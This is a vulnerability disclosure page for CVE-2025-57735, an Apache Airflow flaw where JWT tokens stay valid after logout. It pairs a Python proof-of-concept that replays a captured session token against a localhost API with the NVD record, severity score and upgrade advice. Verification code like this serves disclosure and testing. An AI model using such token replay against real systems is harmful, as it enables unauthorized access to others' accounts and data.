CVE-2025-57735

import requests # Target URL configuration target_url = "http://localhost:8080/api/v1/dags" login_url = "http://localhost:8080/login" logout_url = "http://localhost:8080/logout" # Step 1: Attacker monitors traffic or waits for user to login print("[+] Step 1: Intercepting traffic...") # Step 2: User logs in (simulated) session = requests.Session() login_payload = {"username": "admin", "password": "password"} session.post(login_url, data=login_payload) # Step 3: Attacker captures the JWT Token from the request headers or cookies # In a real scenario, this is done via sniffing or XSS jwt_token = session.cookies.get("session") # Assuming session cookie holds the JWT print(f"[+] Captured JWT Token: {jwt_token}") # Step 4: User logs out print("[+] Step 4: User performs logout...") logout_response = session.get(logout_url) print(f"[+] Logout status code: {logout_response.status_code}") # Step 5: Attacker reuses the intercepted token print("[+] Step 5: Attacker reuses intercepted token...") attack_headers = {"Authorization": f"Bearer {jwt_token}"} attack_response = requests.get(target_url, headers=attack_headers) # Step 6: Check if the request is successful if attack_response.status_code == 200: print("[!] VULNERABILITY CONFIRMED: Token is still valid after logout.") print(f"[+] Response Data: {attack_response.text[:100]}...") else: print("[-] Token was invalidated. Vulnerability not present.")

{"cve": {"id": "CVE-2025-57735", "sourceIdentifier": "[email protected]", "published": "2026-04-09T11:16:20.757", "lastModified": "2026-04-17T13:03:16.150", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "When user logged out, the JWT token the user had authtenticated with was not invalidated, which could lead to reuse of that token in case it was intercepted. In Airflow 3.2 we implemented the mechanism that implements token invalidation at logout. Users who are concerned about the logout scenario and possibility of intercepting the tokens, should upgrade to Airflow 3.2+\n\n\n\nUsers are recommended to upgrade to version 3.2.0, which fixes this issue."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N", "baseScore": 9.1, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 5.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-613"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:apache:airflow:*:*:*:*:*:*:*:*", "versionStartIncluding": "3.0.0", "versionEndExcluding": "3.2.0", "matchCriteriaId": "D8133DE3-F556-42F5-8298-FD4CF40787B6"}]}]}], "references": [{"url": "https://github.com/apache/airflow/pull/56633", "source": "[email protected]", "tags": ["Issue Tracking"]}, {"url": "https://github.com/apache/airflow/pull/61339", "source": "[email protected]", "tags": ["Issue Tracking"]}, {"url": "https://lists.apache.org/thread/ovn8mpd8zkc604hojt7x3wsw3kc60x98", "source": "[email protected]", "tags": ["Mailing List", "Vendor Advisory"]}, {"url": "http://www.openwall.com/lists/oss-security/2026/04/09/16", "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": ["Mailing List", "Third Party Advisory"]}]}}